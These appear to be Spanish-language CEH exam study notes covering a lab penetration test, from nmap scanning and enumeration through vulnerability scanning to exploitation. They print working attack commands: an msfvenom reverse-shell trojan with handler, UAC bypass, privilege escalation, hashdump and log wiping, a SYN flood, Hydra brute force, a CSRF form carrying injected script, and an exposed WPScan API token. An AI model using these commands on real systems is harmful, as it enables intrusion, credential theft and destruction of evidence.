1. Fase de Escaneo
---------------
  1.1 Escaneo de la red para averiguar las máquinas
  -------------------------------------------------
  nmap -sn [direccion-red] -oN machines

  1.2 Escaneo profundo individual de cada una de las máquinas
  -----------------------------------------------------------
  nmap -A -Pn [ip_machina] -oN [W10|WS19|WS16|Ubuntu|Android]

  1.3 Devolver el escaneo en formato XML para poder insertarlo en Metasploit
  -------------------------------------------------------------------------
    Escaneo para importar a Metasploit
    ----------------------------------
    nmap -A -Pn -n 192.168.10.0/24 -oX fichero (Importante: Lanzarlo como root)
    
    Preparar Metasploit para utilizar la base de datos
    --------------------------------------------------
    - Comprobar que postgreSQL --> systemctl status postgresql
    - Conectar la base de datos a Metasploit --> msfdb init
    - Reiniciamos el servicio de postgreSQL --> systemctl restart postgresql
    
    Importar información a Metasploit
    ---------------------------------
    db_import [path]

2. Fase de enumeración
---------------------
  2.1 Extraer información acerca de carpetas compartidas - Enumeración NetBIOS
  ----------------------------------------------------------------------------
  nmap -sV -v --script nbstat.nse 192.168.10.16
  
  Enumeración NetBIOS con enum4linux
  ----------------------------------
  enum4linux -n [IP]

  2.2 Enumeración SNMP
  ---------------------
  snmp-check [ip] > snmpEnum.txt
  
  2.2.1 Enumeración SNMP de usuarios con Metasploit
  -----------------------------------
  use auxiliary/scanner/snmp/snmp_enumusers
  Nos pide el host al que vamos a escanear --> set rhosts 192.168.10.16
  
  2.3 Enumeración LDAP
  --------------------
    Desde Parrot
    ------------
    ldap -x -b "dc=ceh,dc=com" "*" -h [ip-ldap-server] --> No funciona
    
      Enumeración LDAP desde NMAP
      ---------------------------
        - Enumeración Completa
        --------------------
        nmap -p389 --script ldap-search --script-args 'ldap.username="cn=[user],cn=users,dc=[domain],dc=[TLD]",ldap.password="[pass]"' [IP]

        - Enumeración de los Usuarios, filtrando por el atributo del nombre de la cuenta
        -----------------------------------------------------------------------------------------------------
        nmap -p389 --script ldap-search --script-args 'ldap.username="cn=[user],cn=users,dc=[domain],dc=[TLD]",ldap.password="[pass]",ldap.qfilter=users,ldap.attrib=sAMAccountName' [IP]
    
    Desde Windows 10
    ----------------
    Utilizando la herramienta ADExplorer.exe de SysInternals, le indicamos la IP del Servidor LDAP y le damos a conectar.
    
  2.4 Enumeración DNS
  -------------------
   nslookup
   > server [ip-server]
   > ceh.com
   > server2016.ceh.com
  
5. Análisis de vulnerabilidades
-------------------------------
  Configuración de OpenVAS
  ---------------------------
    Crear directorios
    -----------------
    mkdir -p /var/lib/gvm/data-objects/gvmd/20.08/configs
    mkdir -p /var/lib/gvm/data-objects/gvmd/20.08/port_lists
    mkdir -p /var/lib/gvm/data-objects/gvmd/20.08/report_formats

    Descargar la información para la configuración
    ----------------------------------------------
    greenbone-feed-sync --type GVMD_DATA

    Actualizar la BD de OpenVAS desde el interfaz gráfico
    -----------------------------------------------------
    Aplicaciones/Pentesting/Análisis de Vulnerabilidades/OpenVAS - Greenbone/Update New Database

    Lanzamos OpenVAS
    ----------------
    Aplicaciones/Pentesting/Análisis de Vulnerabilidades/OpenVAS - Greenbone/Start Greenbone Vulnerability Manager Service

    Realizar un escaneo
    -------------------
    - Scans/Task/Task Wizard.
    - Indicamos la IP objetivo del escaner de vulnerabilidades.
    - Le damos a Strat Scan.

  Análisis de vulnerabilidades para Aplicaciones Web
  -----------------------------------------------------
    Ver la ayuda de Nikto
    ---------------------
    nikto -H

    Lanzar escaneo con todas las opciones disponibles
    -------------------------------------------------
    nikto -h [host] -Tuning x

    Exportar el resultado del escaneo a un fichero
    ----------------------------------------------
    nikto -h [host] -o Resultado -F txt
  
6. Hacking
----------
  1. Capturar Hashes con Responder
  --------------------------------
  responder -I [interfaz_red] (Mirar las interfaces de red antes ifconfig|ip address)
  
  Desde la máquina de Windows 10 hacemos lo siguiente:
   - Abrimos el explorador de ficheros.
   - Buscamos la carpeta \\CarpetaCEH.
  
  Podemos ver que en responder nos sale el Hash NTLMv2 del usuario que se ha intentado conectar.
  
  Copiamos el hash a un archivo.
  
  Ahora para romper el hash utilizamos John the Ripper.
  -----------------------------------------------------
  john --wordlist=[path-diccionario] [path-hash]
  
  En el examen ponemos el responder para ver si capturamos algún hash, dado que es posible que las máquinas estén haciendo peticiones.
  
  2. Atacando desde Windows 10
  ----------------------------
    Para crackear passwords (Practicar con ambas herramientas de cara al examen)
    -----------------------
    - L0phtCrack
    - RainbowCrack
    
  3. Esteganografía
  -----------------
  Este proceso se hará desde la máquina Windows 10 que nos den en el examen y tendremos las siguientes herramientas:
   - OpenStego (Imágenes).
   - SNOW (Espacios en blanco).
  
  En este desafío nos darán una imagen y nos dirán que hay algo oculto, en un desafío previo habremos conseguido la contraseña.
  
  4. Crear un troyano con metasploit y utilizarlo sobre una máquina windows
  -------------------------------------------------------------------------
  msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -f exe LHOST=[IP] LPORT=[port] -o pruebas.exe
  
  Ahora lo movemos al directorio /var/www/html para poder ponerlo en el servidor web con Apache.
  - cp pruebas.exe /var/www/html
  
  Arrancamos el servicio apache2
  - systemctl start apache2
  
  Comprobamos que se ha arrancado correctamente el servicio
  - systemctl status apache2
  
  Una vez tenemos el servidor en marcha, procedemos a descargar el troyano en la máquina víctima.
  
  También deberemos poner la escucha en la consola de metasploit con los siguientes comandos:
  msfconsole
  msf6> use multi/handler
  msf6> set payload windows/meterpreter/reverse_tcp
  msf6> set lhost [IP]
  msf6> set lport [PORT]
  msf6> run -j
  
  A continuación, ejecutamos el troyano en la víctima y nos vamos a la consola de metasploit donde veremos que se ha creado la sesión.
  
  Usamos el exploit windows/local/bypassuac_fodhelper para saltarnos la uac del sistema le configuramos lo siguiente:
  - El payload windows/meterpreter/reverse_tcp.
  - La sesión de meterpreter.
  
  Lo lanzamos con exploit y nos creará una nueva sesión.
  
  Una vez tenemos la sesión, entramos en ella y elevamos nuestros privilegios con el comando: getsystem -t 1.
  
  Ahora somos el usuario NT AUTHORITY\SYSTEM que es el usuario con más privilegios en windows.
  
  Podríamos lanzar un hashdump y posteriormente limpiamos los logs clearev.
  
    Extra
    -----
    Utilizamos el repositorio PowerSploit, en concreto el script PowerUp.ps1 de Privesc
    1. Lo subimos desde la sesión de meterpreter con upload.
    2. Abrímos una shell.
    3. Ejecutamos el script con el comando: powershell -ExecutionPolicy Bypass -Command ". .\PowerUp.ps1;Invoke-AllChecks"
  
  The Fat Rat
  -----------
  Es una herramienta para crear troyanos en macros para office.
  
  A continuación, se indica el proceso de configuración (en el examen ya estará configurado si se usa):
  - Lanzamos dos veces el script setup.sh.
   
  Crear un troyano con njRAT (Posible ejercicio)
  --------------------------------------------
  Le indicamos el puerto al que queremos que se conecte la víctima.
  Nos vamos al apartado builder y creamos el troyano.
  Pasamos el troyano a la carpeta C:\inetpub\wwwroot\ para que podamos descargarlo.
  Desde la víctima ejecutamos el archivo maligno.
  
  Denegación de servicio (DoS)
  ----------------------------
    Con Metasploit
    --------------
    Utilizamos el módulo auxyliary/dos/tcp/synflood
    Debemos indicarle RHOSTS y RPORT.
    Lo ejecutamos con exploit.
    
    Con hping3
    ----------
    hping3 -p [port] -S --flood [ip]
    
  Ataque por diccionario a FTP con THC Hydra
  ------------------------------------------
  Creamos un par de diccionarios:
    - usuarios.txt
    - passwords.txt
  
  Lanzamos hydra con el comando: hydra -L [fichero_usuarios] -P [fichero_passwords] ftp://[IP]
    
  Ataque por diccionario a una página web con Burpsuite
  -----------------------------------------------------
  1. Abrimos Burpsuite.
  2. Configuramos el Firefox para que use el 127.0.0.1:8080 como proxy.
  3. Desde firefox hacemos un intento de login para que Burpsuite lo intercepte.
  4. Mandamos el intento de login al Intruder.
  5. En el Intruder, marcamos el usuario y la contraseña y lo configuramos como Cluster Bomb.
  6. Cargamos los ficheros de username.txt y password.txt.
  7. Le damos a Start Attack para que comience a probar las combinaciones.
  
  Laboratorio CSRF
  ----------------
  Uso de WPSCAN para obtener información de un sitio que utiliza wordpress.
  -------------------------------------------------------------------------
  Para el uso de WPSCAN es necesario indicar el API de la cuenta: API WPSCAN: 4o1u4sDYaoULM5VuRPSmth7WvtJ8NeDqGnZ6frqKrRg
    Escaneo wpscan para detectar plugins y enumerar los plugins que sean vulnerables
    --------------------------------------------------------------------------------
    wpscan --api-token 4o1u4sDYaoULM5VuRPSmth7WvtJ8NeDqGnZ6frqKrRg --url [url] --plugins-detection aggressive --enumerate vp

    Escaneo wpscan para enumerar los usuarios
    -----------------------------------------
    wpscan --api-token 4o1u4sDYaoULM5VuRPSmth7WvtJ8NeDqGnZ6frqKrRg --url [url] --enumerate u
    
    
  Laboratorio CSRF
  ----------------
  <html> 
	<body onload="document.forms['CSRF'].submit()" > 
		<form name="CSRF" action="http://192.168.10.16:8080/CEH/wp-admin/admin.php?page=leenkme_facebook" method="POST"> 
			<input type="hidden" name="facebook_profile" value="on" /> 
			<input type="hidden" name="fb_publish_wpnonce" value="" /> 
			<input type="hidden" name="_wp_http_referer" value="CSRF" /> 
			<input type="hidden" name="facebook_message" value="Hacked!!!" /> 
			<input type="hidden" name="facebook_linkname" value="CSRF" /> 
			<input type="hidden" name="facebook_caption" value="CSRF" /> 
			<input type="hidden" name="facebook_description" value="</textarea>;<script>prompt();</script>" /> 
			<input type="hidden" name="default_image" value="CSRF" /> 
			<input type="hidden" name="message_preference" value="author" /> 
			<input type="hidden" name="clude" value="in" /> 
			<input type="hidden" name="publish_cats[];" value="0" /> 
			<input type="hidden" name="update_facebook_settings" value="Save Settings" /> 
			<input type="submit" value="Submit form" />
		</form> 
	</body>
</html> 
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
